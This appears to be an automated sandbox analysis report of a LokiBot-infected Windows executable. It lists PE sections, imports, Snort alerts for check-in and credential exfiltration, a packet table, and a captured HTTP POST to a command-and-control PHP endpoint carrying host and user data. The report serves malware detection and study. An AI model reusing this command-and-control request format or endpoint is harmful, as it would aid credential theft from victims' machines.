.htext	0x38000	0x3000	0x3000	2a313124592a4f368e26757b5dfc0caf	False	0.004231770833333333	Non-ISO extended-ASCII text, with very long lines (11161), with NEL line terminators	0.7979839677598691	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x378e0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 256			0.3223684210526316
RT_ICON	0x375f8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640			0.19623655913978494
RT_ICON	0x374d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192			0.4155405405405405
RT_GROUP_ICON	0x374a0	0x30	data			1.0
RT_VERSION	0x37150	0x350	data	English	United States	0.4740566037735849

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/28/24-20:56:53.651892	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.4	31.220.1.194
03/28/24-20:56:55.077590	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.4	31.220.1.194
03/28/24-20:56:55.077590	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.4	31.220.1.194
03/28/24-20:56:57.374972	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.4	31.220.1.194
03/28/24-20:56:57.374972	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.4	31.220.1.194
03/28/24-20:56:57.374972	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.4	31.220.1.194
03/28/24-20:56:52.327533	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.4	31.220.1.194
03/28/24-20:56:55.077590	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.4	31.220.1.194
03/28/24-20:56:53.651892	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49731	80	192.168.2.4	31.220.1.194
03/28/24-20:56:53.651892	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.4	31.220.1.194
03/28/24-20:56:57.374972	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.4	31.220.1.194
03/28/24-20:56:52.327533	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49730	80	192.168.2.4	31.220.1.194
03/28/24-20:56:52.327533	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.4	31.220.1.194
03/28/24-20:56:55.077590	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.4	31.220.1.194
03/28/24-20:56:53.651892	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49731	80	192.168.2.4	31.220.1.194
03/28/24-20:56:52.327533	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49730	80	192.168.2.4	31.220.1.194

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 28, 2024 20:56:52.138751030 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:52.324392080 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:52.324484110 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:52.327533007 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:52.515103102 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:52.515180111 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:52.700628996 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338748932 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338768005 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338778973 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338794947 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338823080 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.338857889 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.338922977 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.338922977 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338948011 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338970900 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.338985920 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.338989019 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.339029074 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.339062929 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.339075089 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.339106083 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.453517914 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.453567028 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.464128017 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.532731056 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.532788038 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.532880068 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.532927036 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.532968998 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.533015013 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.533049107 CET	80	49730	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.533083916 CET	49730	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.649363995 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.649665117 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.651891947 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:53.835937977 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:53.836163998 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.020606041 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.826889038 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.826910973 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.826991081 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.827003002 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.827081919 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.827140093 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.827157021 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.827240944 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.827851057 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.827899933 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.827914953 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.827948093 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.828030109 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.828066111 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.828141928 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.828185081 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.890815973 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:54.935950041 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:54.936013937 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.013871908 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:55.013886929 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:55.013936043 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.013938904 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:55.013957977 CET	80	49731	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:55.013959885 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.013982058 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.014029980 CET	49731	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.075428009 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:55.075678110 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.077589989 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.262824059 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:55.262903929 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:55.448153973 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.141957045 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.141978025 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.141990900 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.142004967 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.142018080 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.142065048 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.142077923 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.142090082 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.142102957 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.149426937 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:56.149605036 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:56.272609949 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.272768021 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:56.335365057 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.335378885 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.335402012 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:56.335413933 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.335428953 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:56.335439920 CET	80	49732	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:56.335450888 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:56.335477114 CET	49732	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:57.187721968 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:57.372476101 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:57.372616053 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:57.374972105 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:57.559587955 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:57.559639931 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:57.744137049 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431116104 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431134939 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431143045 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431149006 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431157112 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431164980 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431179047 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431231022 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431242943 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.431422949 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.482791901 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.539453030 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.592279911 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617005110 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617022991 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617060900 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617074966 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617103100 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617120028 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617134094 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617152929 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617166996 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617167950 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617201090 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617213964 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617240906 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617295980 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617316961 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617336035 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617357016 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617371082 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617398977 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617445946 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617477894 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617487907 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.617505074 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.617541075 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.667510986 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.667526007 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.667678118 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.777357101 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.777403116 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.777553082 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806293011 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806322098 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806334972 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806377888 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806390047 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806402922 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806416035 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806467056 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806473970 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806473970 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806473970 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806480885 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806504965 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806529045 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806543112 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806555986 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806567907 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806577921 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806601048 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806602001 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806643963 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.806651115 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806663036 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.806698084 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812258959 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812298059 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812313080 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812342882 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812361956 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812375069 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812386990 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812400103 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812421083 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812429905 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812455893 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812469006 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812489986 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812510014 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812552929 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812561035 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812573910 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812586069 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812607050 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812635899 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812648058 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812659025 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.812671900 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.812705994 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.852797031 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.852822065 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.852859974 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.852860928 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.852885962 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.852922916 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.962702036 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.962717056 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.962728977 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.962749004 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.962785006 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.962807894 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.998282909 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.998310089 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.998368979 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.998435020 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:58.998461008 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:58.998503923 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.008491039 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008514881 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008562088 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.008562088 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008609056 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008627892 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008651972 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.008683920 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008697987 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008719921 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.008733988 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008769989 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.008780003 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008830070 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008867025 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.008898973 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.008981943 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009007931 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009020090 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009068012 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009108067 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009128094 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009140015 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009169102 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009176016 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009215117 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009244919 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009252071 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009309053 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009344101 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009373903 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009387970 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009423971 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009434938 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009464979 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009500980 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009521961 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009571075 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009593010 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009608984 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:56:59.009627104 CET	80	49733	31.220.1.194	192.168.2.4
Mar 28, 2024 20:56:59.009665012 CET	49733	80	192.168.2.4	31.220.1.194
Mar 28, 2024 20:57:01.975877047 CET	49733	80	192.168.2.4	31.220.1.194

HTTP Request Dependency Graph

31.220.1.194

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	31.220.1.194	80	7628	C:\Users\user\Desktop\XZoxEqlRUw.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 20:56:52.327533007 CET	246	OUT	POST /~zadmin/ptr5/mono.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 31.220.1.194 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E0B63912 Content-Length: 176 Connection: close
Mar 28, 2024 20:56:52.515180111 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones142233JONES-PCk0FDD42EE188E931437F4FBE2Ceamq5
Mar 28, 2024 20:56:53.338748932 CET	1286	IN	HTTP/1.1 404 Not Found Date: Thu, 28 Mar 2024 19:56:52 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 